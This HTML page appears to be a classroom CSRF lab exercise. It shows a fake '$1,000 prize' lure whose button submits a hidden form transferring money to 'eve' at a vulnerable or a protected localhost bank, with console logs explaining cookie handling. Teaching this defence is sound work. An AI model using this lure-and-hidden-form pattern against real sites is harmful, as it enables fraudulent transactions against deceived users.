<!DOCTYPE html>
<html>
<head>
    <title>Free Prize!</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; padding: 50px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; }
        .prize-box { background: white; color: #333; padding: 40px; border-radius: 20px; max-width: 600px; }
        h1 { color: #667eea; font-size: 48px; }
        p { font-size: 18px; margin: 20px 0; }
        .target-selector { background: #f5f5f5; padding: 20px; border-radius: 10px; margin: 20px 0; }
        .target-selector select { width: 100%; padding: 12px; font-size: 16px; border: 2px solid #667eea; }
        .target-vulnerable { background: #ffebee; color: #c62828; padding: 12px; }
        .target-secure { background: #e8f5e9; color: #2e7d32; padding: 12px; }
        button { background: #667eea; color: white; border: none; padding: 20px 50px; font-size: 24px; cursor: pointer; }
        .hidden { display: none; }
    </style>
</head>
<body>
    <div class="prize-box">
        <h1>Congratulations!</h1>
        <p style="font-size: 22px; font-weight: bold; color: #667eea;">
            You've Been Selected!
        </p>
        <p>
            You have won a <strong>$1,000 cash prize</strong> from our 
            exclusive promotion!
        </p>
        
        <div class="instructions">
            <strong>[For Examiner]:</strong> Select target bank below, login to that bank in another tab, then click the prize button.
        </div>
        
        <div class="target-selector">
            <label for="target-select">[Select Attack Target]</label>
            <select id="target-select" onchange="updateTarget()">
                <option value="8000">Port 8000 - Vulnerable Bank (NO CSRF Protection)</option>
                <option value="8001">Port 8001 - Secure Bank (WITH CSRF Protection)</option>
            </select>
            <div id="target-info" class="target-info target-vulnerable">
                [WARNING] Attacking VULNERABLE bank - Attack should SUCCEED
            </div>
        </div>
        
        <p>
            Click the button below to claim your reward now:
        </p>
        <button onclick="claimPrize()">Claim Your Prize!</button>
        
        <form id="csrf-attack" class="hidden" method="POST" 
              action="http://localhost:8000/transfer.php">
            <input type="hidden" name="recipient" value="eve">
            <input type="hidden" name="amount" value="1000">
        </form>
        
        <p class="disclaimer">
            *This is an educational demonstration for Exercise 4.2<br>
            <strong>Current Target:</strong> <span id="current-target">localhost:8000 (Vulnerable)</span>
        </p>
    </div>
    
    <script>
        console.log('%c[ATTACKER SITE] Cookie Analysis', 'color: red; font-size: 16px; font-weight: bold');
        console.log('Current Domain:', window.location.hostname);
        console.log('Current Port:', window.location.port);
        console.log('Cookies visible to this page:', document.cookie || '(none)');
        console.log('%cNOTE: HttpOnly cookies are NOT visible to JavaScript!', 'color: orange; font-weight: bold');
        console.log('%cBut browser WILL send them automatically with form submission!', 'color: orange; font-weight: bold');
        console.log('='.repeat(70));
        
        function updateTarget() {
            const select = document.getElementById('target-select');
            const port = select.value;
            const form = document.getElementById('csrf-attack');
            const infoDiv = document.getElementById('target-info');
            const currentTarget = document.getElementById('current-target');
            
            form.action = `http://localhost:${port}/transfer.php`;
            
            console.log(`%c[TARGET CHANGE] Port ${port}`, 'color: blue; font-weight: bold');
            console.log(`   Form will submit to: ${form.action}`);
            console.log(`   Bank type: ${port === '8000' ? 'VULNERABLE' : 'SECURE'}`);
            console.log('='.repeat(70));
            
            if (port === '8000') {
                infoDiv.className = 'target-info target-vulnerable';
                infoDiv.innerHTML = '[WARNING] Attacking VULNERABLE bank - Attack should SUCCEED';
                currentTarget.textContent = 'localhost:8000 (Vulnerable)';
            } else {
                infoDiv.className = 'target-info target-secure';
                infoDiv.innerHTML = '[PROTECTED] Attacking SECURE bank - Attack should be BLOCKED';
                currentTarget.textContent = 'localhost:8001 (Secure)';
            }
        }
        
        function claimPrize() {
            const port = document.getElementById('target-select').value;
            const bankType = port === '8000' ? 'VULNERABLE' : 'SECURE';
            
            console.log('%c[CSRF ATTACK INITIATED]', 'color: red; font-size: 18px; font-weight: bold; background: yellow');
            console.log('='.repeat(70));
            console.log('[Attack Details]');
            console.log('   Target Bank:', bankType);
            console.log('   Target URL:', `http://localhost:${port}/transfer.php`);
            console.log('   Recipient:', 'eve');
            console.log('   Amount:', '$1,000');
            console.log('='.repeat(70));
            
            console.log('[Cookies visible to attacker (JavaScript)]');
            if (document.cookie) {
                const cookies = document.cookie.split(';').map(c => c.trim());
                cookies.forEach(cookie => {
                    console.log(`   ${cookie}`);
                });
            } else {
                console.log('   (none - all cookies are HttpOnly or no cookies set)');
            }
            console.log('='.repeat(70));
            
            console.log('%c[CRITICAL] Browser\'s Automatic Behavior', 'color: orange; font-weight: bold; font-size: 14px');
            console.log('    Browser will automatically send ALL cookies for localhost:' + port);
            console.log('    This includes HttpOnly session cookies (PHPSESSID)');
            console.log('    JavaScript cannot see HttpOnly cookies, but browser sends them!');
            console.log('    This is how CSRF attacks work - cookie reuse across origins');
            console.log('='.repeat(70));
            
            console.log('%c[Submitting hidden form...]', 'color: blue; font-weight: bold');
            console.log('   Method: POST');
            console.log('   Action:', `http://localhost:${port}/transfer.php`);
            console.log('   Form data: recipient=eve, amount=1000');
            console.log('='.repeat(70));
            
            if (port === '8000') {
                console.log('%c[VULNERABLE VERSION] Expected Result:', 'color: red; font-weight: bold');
                console.log('   - No CSRF token validation');
                console.log('   - Attack will SUCCEED');
                console.log('   - Money will be transferred');
            } else {
                console.log('%c[SECURE VERSION] Expected Result:', 'color: green; font-weight: bold');
                console.log('   + CSRF token validation enabled');
                console.log('   + Attack will be BLOCKED');
                console.log('   + Transfer rejected (no valid token)');
            }
            console.log('='.repeat(70));
            
            alert(`Processing your prize...\n\nPlease wait while we verify your account.\n\n[Hidden: Attacking ${bankType} bank on port ${port}]\n\n>> CHECK BROWSER CONSOLE (F12) FOR DETAILED LOGS!`);
            
            document.getElementById('csrf-attack').submit();
        }
        
        window.addEventListener('load', function() {
            console.log('%c[SUCCESS] Attacker page loaded successfully', 'color: green; font-weight: bold');
            console.log('>> Open browser DevTools (F12) to see all cookie and attack details');
            console.log('[Instructions]');
            console.log('   1. Select target bank from dropdown');
            console.log('   2. Login to that bank in another tab');
            console.log('   3. Return here and click "Claim Your Prize"');
            console.log('   4. Watch console logs during attack');
            console.log('='.repeat(70));
        });
    </script>
</body>
</html>